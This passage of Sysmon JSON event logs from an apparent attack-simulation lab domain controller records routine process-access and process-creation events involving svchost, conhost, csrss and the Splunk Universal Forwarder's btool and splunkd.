{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.621\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001081850300}\r\nProcessId: 4076\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nParentProcessId: 4056\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.621","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001081850300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","ParentProcessId":"4056","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nSourceProcessId: 4056\r\nSourceThreadId: 4060\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001081850300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","SourceProcessId":"4056","SourceThreadId":"4060","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001081850300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001081850300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001081850300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 